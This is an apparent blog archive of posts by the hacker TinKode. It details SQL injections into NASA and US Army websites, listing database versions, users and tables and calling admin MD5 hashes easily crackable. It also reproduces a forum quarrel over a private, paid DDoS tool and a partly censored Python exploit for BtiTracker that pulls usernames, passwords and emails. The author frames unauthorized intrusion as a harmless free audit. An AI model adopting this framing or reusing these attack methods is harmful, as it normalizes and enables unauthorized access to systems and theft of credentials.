Showing posts with label Razvan Manole Cernacianu.

Sunday, February 5, 2012

TinKode-NASA Full-Disclosure! AGAIN


NASA Full-Disclosure! AGAIN

Posted by isrtinkode on February 19, 2010
 _   _                      _               _
| \ | | __ _ ___  __ _     / \   __ _  __ _(_)_ __
|  \| |/ _` / __|/ _` |   / _ \ / _` |/ _` | | '_ \
| |\  | (_| \__ \ (_| |  / ___ \ (_| | (_| | | | | |
|_| \_|\__,_|___/\__,_| /_/   \_\__, |\__,_|_|_| |_|
                                |___/
              #Full Disclosure... c0de.breaker
#Important
Ok. First of all, the reason I made this SQLi public (even though I had no intention to make this), is because I found out that somebody else discovered the vulnerable parameter. I found this SQLi 3 months ago.
# Why do I test websites?
Because it is my hobby, and I want to prove that even the big websites, which should be highly secured, can be hacked. This is the reality, and it makes me sad. I feel alright about what I’m doing, because if anyone finds a vulnerability before me, he/she could use it in harmful ways such as: shelling, rooting, backdooring, deleting, etc.
The WebSite Vulnerable: http://saif-1.larc.nasa.gov (CEOS Systems Analysis Database)
Testing:


Information:
#Version: 5.1.31-community
#User: *******
#Main Database: *******
#Path of MySQL: C:\Documents and Settings\All Users\Application Data\MySQL\MySQL Server 5.1\Data\
Also, magic_quotes_gpc=OFF, and “user” from mysql has all privileges:
Bad…
Other Databases:
#ceossadb
#information_schema
#mysql
#ceosvis
Tables from “ceosvis” database:
#instrument
#takes
#measurement
#contains
#mission
Tables from main Database:
I made this public because I saw the website down, and I think the administrators will fix the vulnerability once someone reports the problem. (Sorry because I didn’t make this first, if was that.)

TinKode-NASA vulnerable to MSSQL Injection


NASA vulnerable to MSSQL Injection

Posted by isrtinkode on February 19, 2010
 _   _                   __  __  _____ _____  ____  _      _
| \ | |                 |  \/  |/ ____/ ____|/ __ \| |    (_)
|  \| | __ _ ___  __ _  | \  / | (___| (___ | |  | | |     _
| . ` |/ _` / __|/ _` | | |\/| |\___ \\___ \| |  | | |    | |
| |\  | (_| \__ \ (_| | | |  | |____) |___) | |__| | |____| |
|_| \_|\__,_|___/\__,_| |_|  |_|_____/_____/ \___\_\______|_|

   #Nasa vulnerable again (MSSQLi)@c0de.breaker
Hello, unfortunately I found another serious vulnerability in NASA, more precisely an MSSQL Injection.
I admit that this time it was harder to make the injection.
It is the fourth time this happens, but nothing can surprise me anymore. As always, I showed no interest in the content of the website.
I hope this is the last time I see these kinds of vulnerabilities.
Link: www.gltrs.grc.nasa.gov
Testing:


As you can see, this time I didn’t hide the vulnerable parameter, mainly because it can be easily found on google with filetype:aspx.
Main Information:
#Version: Microsoft SQL Server
#Operating system: Windows
#Web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.7
#Main Database: RDP
#Current User: RDP_Ext_RA
Tables from main database “RDP”:
#Abstract
#Author
#AuthorTypeLookup
#RDPLibrary
#RDPTemp
#ReportTemplateLookup
#ReportTypeLookup
#RptTempDistLookup
#RDP
All databases (92):
As a last remark:
I hope my findings aren’t all for nothing, and that NASA will do a complete inspection on all their websites.

TinKode-NASA website security issues


NASA website security issues

Posted by isrtinkode on February 19, 2010
     _   _           _____
    | \ | |   /\    / ____|  /\
    |  \| |  /  \  | (___   /  \
    | . ` | / /\ \  \___ \ / /\ \
    | |\  |/ ____ \ ____) / ____ \
    |_| \_/_/    \_\_____/_/    \_\
      #TinKode@Romania

            The Center for Aerosol Research at NASA's Goddard Space Flight Center

                                    
The Goddard Space Flight Center (GSFC) is a major NASA space research laboratory established on May 1, 1959 as NASA’s first space flight center. GSFC employs approximately 10,000 civil servants and contractors, and is located approximately 6.5 miles (10.5 km) northeast of Washington, D.C. in Greenbelt, Maryland, USA. GSFC, one of ten major NASA field centers, is named in recognition of Dr. Robert H. Goddard (1882-1945), the pioneer of modern rocket propulsion in the United States.
Vulnerable website: http://aerocenter.gsfc.nasa.gov
I want to say that it was very hard to make this injection.
The webserver had good protection but wasn’t fully secured.
This kind only works manually, you can’t do it with apps.
In this picture you can see the visible columns:
Main information:
#Version:5.0.82-log
#User:carwww@localhost
#Database:aerocenter
#Datadir:/var/mysql/
Here we can see all databases:
[1] information_schema
[2] aerocenter
[3] car
[4] test
In this screenshot are all tables from all databases:
I don’t know exactly from which database are the tables… so I think I have not split them very well
Tables from “aerocenter” database:
Tables from “car” database:
Tables from “test” database:
Columns from all databases:
Here we have the same situation like with tables…
Admins accounts:
These hashes are md5() and they can be easily cracked.
Bye, TinKode! :)

TinKode-US Army full disclosure


US Army full disclosure

Posted by isrtinkode on February 19, 2010
                                                                         _
                                /\                                    (_) |
                               /  \   _ __ _ __ ___  _   _   _ __ ___  _| |
                              / /\ \ | '__| '_ ` _ \| | | | | '_ ` _ \| | |
                             / ____ \| |  | | | | | | |_| |_| | | | | | | |
                            /_/    \_\_|  |_| |_| |_|\__, (_)_| |_| |_|_|_|
                                                      __/ |
                                                     |___/
                                              #full disclosure@c0de.breaker
#Information:
First Army was established on August 10, 1918 as a field army when sufficient American military manpower had arrived in France during World War I. As an element of the American Expeditionary Force (AEF) in the latter stages of World War I it was the first of three field armies established under the AEF. Serving in its ranks were many figures who later played important roles in World War II. First Army was inactivated in April 1919.
Some time ago I found a website vulnerable to MSSQL Injection (www.onestop.army.mil)… But today I tested another website, and in 2 minutes I found a vulnerable parameter.
Vulnerable link: www.first.army.mil
Testing:


Main Information:
#Version: Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86) Nov 24 2008 13:01:59 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
#User: Vacancyuser
#Principal Database: FirstArmyVacancies
#Server Name: GIcensoredL02
#Server: Microsoft-IIS/6.0
Version:
All databases from webserver:
Tables from “fsweb” database:
Columns from table_name “POC”:
I want to say, I didn’t extract anything from any database, like usernames, passwords, addresses, etc.

Friday, February 3, 2012

ISR Trinity Bomb DDoS Tool - Forum discussion

I never said anywhere that the source was written by me from scratch, only that it isn't a single one; it's made from about 3 or 4 sources combined. If you're that good, you can make a similar one yourself, nobody has anything against that. But I don't understand why the f*** you care what someone else does. Stay in your own f***ing lane, and if you don't like it, go to another thread.

@ censored
1. Yes
2. No

@ censored
No!
...................................................................................................................................................................

Quote: Originally posted by TinKode
@censored
I never said anywhere that the source was written by me from scratch, only that it isn't a single one; it's made from about 3 or 4 sources combined. If you're that good, you can make a similar one yourself, nobody has anything against that. But I don't understand why the f*** you care what someone else does. Stay in your own f***ing lane, and if you don't like it, go to another thread.

@ censored
1. Yes
2. No

@ censored
No!

Where can I download this program?
...................................................................................................................................................................
Quote: Originally posted by censored 10
@TinKode, it seems you're one of those show-offs. Don't you know any other way to talk?
That's how I like to talk to people who *** with my head; I'm rather peaceful by nature.

@ censored You can't get it anywhere. It's private. Money Money if you want it!
...................................................................................................................................................................

@TinKode, man, chill. There's no need for swearing and other c***. It's just that people have a right to information. The nice thing would be to make it public if you're demonstrating something anyway..


@ censored, relax, it has been tested by others and it works all too well.





Thursday, February 2, 2012

TinKode-Youtube HTML Code Injection - InSecurity.RO



TinKode-Youtube Defaced and Redirected Insecurity.ro



TinKode-Google XSS - HTML Code Injection



TinKode-Translate.Google.Com XSS @ InSecurity.Ro



TinKode-BtiTracker 1.3.x – 1.4.x Exploit [Python]


BtiTracker 1.3.x – 1.4.x Exploit [Python]
Posted by: TinKode
Date: June 09, 2010 07:37PM

BtiTracker 1.3.x – 1.4.x Exploit





#!/usr/bin/env python
#
################################################################################
# ______           ____                                      __      [ xpl0it ] #
#/\__  _\        /\   _`\                                 __/\ \__              #
#\/_/\ \/     ___\ \,\L\_\     __    ___   __   __  _ __ /\_\ \ ,_\  __  __     #
#   \ \ \   /' _ `\/_\__ \   /'__`\ /'___\/\ \/\  \/\`'__\/\ \ \ \/ /\ \/\ \    #
#    \_\ \__/\ \/\ \/\ \L\ \/\  __//\ \__/\ \  \_\ \ \ \/ \ \ \ \ \_\ \ \_\ \   #
#    /\_____\ \_\ \_\ `\____\ \____\ \____\\  \____/\ \_\  \ \_\ \__\\/`____ \  #
#    \/_____/\/_/\/_/\/_____/\/____/\/____/  \/___/  \/_/   \/_/\/__/ `/___/> \ #
#                                                    _________________   /\___/ #
#                                                    www.insecurity.ro   \/__/  #
#                                                                               # 
################################################################################  
#                    [  BtiTracker 1.3.X - 1.4.X Exploit ]                      # 
#    Greetz: daemien, Sirgod, Puscas_Marin,  AndrewBoy, Ras, HrN, vilches       #
#    Greetz: excess, E.M.I.N.E.M, flo flow,  paxnWo, begood, and ISR Staff      # 
################################################################################  
#                    Because we care, we're security aware                      # 
################################################################################  
 
import sys, urllib2, re
  
if len(sys.argv) < 2:
    print "==============================================================="
    print "============== BtiTracker 1.3.X - 1.4.X Exploit  ==============="
    print "==============================================================="
    print "=               Discovered and coded by  TinKode               ="     
    print "=                      www.InSecurity.ro                       ="
    print "=                                                              ="
    print "= Local  Command:                                              ="
    print "= ./isr.py [http://webshit]  [ID]                              ="
    print "=                                                              ="
    print "==============================================================="
    exit()
  
if Censored
    id = 1
else:
    id = censored
  
shitcensored
censored
 censored
  
url  censored
censored
censored
print "\n"
print "============================================="
print "=================  InSecurity ================"
print "============================================="
  
html  = censored
censored =  censored
if  len(slobod)  > 0:
    print "ID       : "  + str(id)
    print "Username : " +  censored
    print "Password : " +  censored
    print "EMail    : " +  censored
    print "============================================="
    print "================= InSecurity ================"
    print "============================================="
else:
    print "censored..."
     
#InSecurity.ro - Romania

TinKode-Database disclosure www.insecurity.ro



TinKode-ISR Trinity Bomb DDoS Tool





vBulletin 4.x - 4.1.2 exploit

Mircea Badea & TinKode (TV)

TinKode - TV - NeptunTV (NASA)

TinKode - TV - British Forces News (MOD UK - Royal Navy)

TinKode-Nasa

TinKode - Facebook XSS

Wednesday, February 1, 2012

TinKode-MySQL.com and Sun/Oracle Hacked



TinKode-hacks into NASA servers



NOTE:
Until now, no. I don't do bad things. I only find and make public the info. Afterwards I send an email to them to fix the holes. It's like a security audit, but for free.